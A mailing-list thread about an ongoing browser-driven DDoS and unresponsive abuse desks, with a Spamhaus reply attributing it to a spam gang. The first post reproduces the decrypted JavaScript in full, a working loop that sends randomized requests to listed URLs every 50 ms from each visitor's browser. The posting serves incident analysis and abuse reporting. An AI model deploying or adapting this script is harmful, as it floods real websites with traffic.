Ongoing DDoS helped by non responsive abuse desks

Hi,

One of our web servers got hammered by ~5K req/s for hours from
browsers with the following referer:
http://www.freewebs.com/ihatespammers/nospam.html
Both freewebs.com and their network provider Cogent has been contacted
without any visible result, even if the script is very effective (no
filtering slows it down but redirecting to an https with an invalid
cert eventually messes the attackers' browser).
Given that the source is still up (and has been updated since
yesterday), I wonder what one can expect by contacting each concerned
domain host.
The decrypted jscript is:

var target=new Array();
target[0]="http://weerona.com/ph/order.php?%rand%"
target[1]="http://fabutons.info/aw/001/?%rand%"
target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%"
target[3]="http://www.fakeidonline.com/store.php?%rand%"
target[4]="http://ccebak.bestti.info/p/?%rand%"
target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%"
target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=%rand%"
target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost"

//target[5]="http://zzizuyxxqquzjphyn.logomarz.com/counter.php?%rand%"
//target[6]="http://svbcrwevktdbxf.logomarz.com/counter.php?%rand%"
//target[7]="http://fqnbywsqfghz.logomarz.com/counter.php?%rand%"
//target[8]="http://fvguwwnemlpgkd.logomarz.com/counter.php?%rand%"
//target[9]="http://www.logodentity.com/ordernow.php?%rand%"
//target[10]="http://www.clearlogo.com/ordernow.php?plan=1&%rand%=%rand%"
//target[11]="http://www.heartysouvenirs.info/?page=shoppingcart&%rand%=%rand%"
//target[9]="http://www.webpromotionnow.com/?%rand%"

// Do not edit below this line

var arrcount = 0;
var chars = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz";
function doddos(){
var randomstring = '';
for (var i=0; i<8; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

if (arrcount > (target.length - 1)){
arrcount = 0;
}

var dimg = new Image;
dimg.src=target[arrcount].replace(/\%rand\%/g,randomstring);
arrcount++;

setTimeout("doddos()",50);
}

setTimeout("doddos()",50);

Hi,

One of our web servers got hammered by ~5K req/s for hours from
browsers with the following referer:

[snip]

target[0]="http://weerona.com/ph/order.php?%rand%"
target[1]="http://fabutons.info/aw/001/?%rand%"
target[2]="http://movi96.dayaugusta.com/aspx/search.asp?t=%rand%"
target[3]="http://www.fakeidonline.com/store.php?%rand%"
target[4]="http://ccebak.bestti.info/p/?%rand%"
target[5]="http://www.zpgo.net/pweb7/texpo/?%rand%"
target[6]="http://www.tex-win.com/productshow.asp?id=1808&%rand%=%rand%"
target[7]="http://7eklp9g3.tagsully.net/p/?%rand%&zz=lowcost"

Which of these is your website?

Cheers,
   Steve

none, they change A records of these rogue domains as they see fit to
spread the attack among more victims.

I found freewebs very responsive, I emailed them and they shut the site down instantly.

It's likely the originators of the DDOS are the Yambo gang out of Ukraine. Other hosts involved in this attack are located on Chinese IPs we know to be under the control of Yambo...
http://www.spamhaus.org/rokso/listing.lasso?-op=cn&spammer=Yambo%20Financials

   Steve Linford
   The Spamhaus Project
   http://www.spamhaus.org